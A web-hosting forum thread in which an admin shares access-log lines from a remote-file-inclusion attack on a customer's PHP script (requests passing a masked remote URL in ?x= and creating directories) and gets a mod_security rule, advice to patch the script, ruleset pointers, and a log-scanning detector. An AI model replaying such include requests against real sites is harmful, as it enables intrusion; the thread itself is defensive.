  1. #1
    Join Date
    Jul 2002
    Posts
    309

    Mod_security: Need help plz!! Hacker still uploading files..

    I just had someone uploading files via PHP on a website,
    and I need a way to block that kind of attack via mod_security.

    Can anyone give me a rule I can add in mod_security to avoid this?


    89.146.147.144 - - [17/Jan/2007:12:24:11 -0600] "GET /favicon.ico HTTP/1.1" 404 1002 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
    89.146.147.144 - - [17/Jan/2007:12:24:23 -0600] "GET /XXXX/index.php?x=************.***?&action=mkdir&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/&newdir=bh HTTP/1.1" 200 154634 "http://www.XXXX.net/XXXX/index.php?x=************.***??" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
    89.146.147.144 - - [17/Jan/2007:12:24:32 -0600] "GET /XXXX/index.php?x=************.***?&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/bh/ HTTP/1.1" 200 7444 "http://www.XXXX.net/XXXX/index.php?x=************.***??&action=mkdir&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/&newdir=bh" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
    89.146.147.144 - - [17/Jan/2007:12:24:41 -0600] "GET /XXXX/index.php?x=************.***?&action=mkdir&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/bh/&newdir=************.*** HTTP/1.1" 200 8422 "http://www.XXXX.net/XXXX/index.php?x=http://************.***?&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/bh/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
    Last edited by SoftWareRevue; 01-18-2007 at 06:04 PM.

  2. #2
    Join Date
    Sep 2002
    Posts
    333
    A quick and dirty mod_sec rule to stop this upload is found below. I'm sure someone can write a more elegant rule though.

    SecFilter "\?x=http"
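
A log-side check for the pattern visible in the access log above, where a query parameter carries a remote URL. It goes beyond the single `x` parameter to any parameter name and to percent-encoded values. This is an added example, not part of the original posts; the sample lines, addresses and host names are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# A parameter value that is itself a remote URL is the include pattern in the thread.
REMOTE_URL = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def remote_url_params(target):
    """Return [(name, value)] for query parameters whose decoded value is a remote URL."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes names and values, so encoded URLs are caught too.
    pairs = parse_qsl(query, keep_blank_values=True)
    return [(k, v) for k, v in pairs if REMOTE_URL.match(v)]


def scan(lines):
    """Map client IP -> list of (timestamp, status, path, parameter name) findings."""
    findings = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = urlsplit(m["target"]).path
        for name, _value in remote_url_params(m["target"]):
            findings[m["ip"]].append((m["ts"], int(m["status"]), path, name))
    return dict(findings)


# Constructed sample lines (documentation addresses and hosts, not from the thread).
SAMPLE = [
    '192.0.2.10 - - [17/Jan/2007:12:24:11 -0600] "GET /favicon.ico HTTP/1.1" 404 1002 "-" "UA"',
    '192.0.2.10 - - [17/Jan/2007:12:24:23 -0600] "GET /app/index.php?x=http://files.example.invalid/s.txt?&action=mkdir&newdir=bh HTTP/1.1" 200 154634 "-" "UA"',
    '192.0.2.10 - - [17/Jan/2007:12:24:32 -0600] "GET /app/index.php?lang=en&page=HTTP%3A%2F%2Ffiles.example.invalid%2Fs.txt HTTP/1.1" 200 7444 "-" "UA"',
    '192.0.2.77 - - [17/Jan/2007:12:30:00 -0600] "GET /app/index.php?x=news&ref=httpd-docs HTTP/1.1" 200 5120 "-" "UA"',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE).items():
        for ts, status, path, name in hits:
            print(f"{ip} [{ts}] {status} {path} param={name}")
```

A 200 status on a flagged request, as in the thread's log, means the script answered the request and should be reviewed together with any files created around that time.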

  3. #3
    Join Date
    May 2002
    Location
    Kingston, Ontario
    Posts
    1,573
    Fix your script instead of adding a mod_security rule..

  4. #4
    Join Date
    May 2006
    Posts
    1,398
    www.gotroot.com

    Get the jitp.conf and rootkits.conf. There are still some things you have to edit out of the jitp.conf; it comes with a syntax error on Apache 1, so before you restart Apache do a configtest, get the error, find it in jitp.conf and comment it out. Some forwarded x header rule, never works on anything. If you get some time I'd go through and just comment out all the stuff you don't need. But those are 2 helpful rulesets to run.

  5. #5
    Join Date
    Jul 2002
    Posts
    309
    Quote Originally Posted by Ramprage
    Fix your script instead of adding a mod_security rule..
    Customer script!!!
    For sure I'm asking them to fix it!
    But a rule will avoid this in the future..
    Sadly, a lot of people don't patch/update their scripts..

    Will give it a try..
    Thank you.
